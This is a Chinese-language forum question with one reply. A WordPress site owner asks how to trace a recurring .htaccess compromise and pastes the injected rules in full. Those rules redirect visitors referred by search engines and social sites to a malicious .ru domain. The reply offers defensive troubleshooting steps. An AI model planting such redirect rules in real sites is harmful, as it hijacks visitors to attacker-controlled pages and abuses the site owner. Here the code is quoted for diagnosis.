Linux
wordpress .htaccess 文件被黑
我難住了。我的客戶 wordpress 網站不斷有其 .htaccess 文件被黑。它正在添加程式碼以將所有流量從搜尋引擎重定向到不同的站點。它不斷更改它重定向到的域。目前(請勿訪問此網站!prime-vermond.ru)
我已更改 ftp 密碼、wordpress 管理員密碼、更新所有外掛、刪除未使用的外掛、將 .htaccess 文件的文件權限更改為 444。
我在想這可能是伺服器漏洞?客戶網站由 godaddy 託管。我給他們發了幾次電子郵件,等待我最新的支持票的回复。
我已經對所有文件進行了搜尋,尋找其中可能包含惡意程式碼的內容,但一無所獲。我假設他們對程式碼進行了 base64 編碼並使用 eval 來執行它。
關於如何更好地找到修改後的壞文件的任何想法?我現在很茫然=/
下面是添加到 .htaccess 文件中的整個程式碼
ErrorDocument 400 http://prime-vermond.ru/trast/index.php ErrorDocument 401 http://prime-vermond.ru/trast/index.php ErrorDocument 403 http://prime-vermond.ru/trast/index.php ErrorDocument 404 http://prime-vermond.ru/trast/index.php ErrorDocument 500 http://prime-vermond.ru/trast/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]
您的應用程式碼正在被利用,或者有人通過網路釣魚/猜測您的帳戶憑據。確保您的 wp 程式碼是最新的,包括任何外掛,並確保您更改了帳戶密碼。
設置所有可能的日誌記錄選項。等待它再次發生。然後記下文件的最後修改時間,然後檢查訪問/錯誤日誌以查看當時是否發生任何異常情況。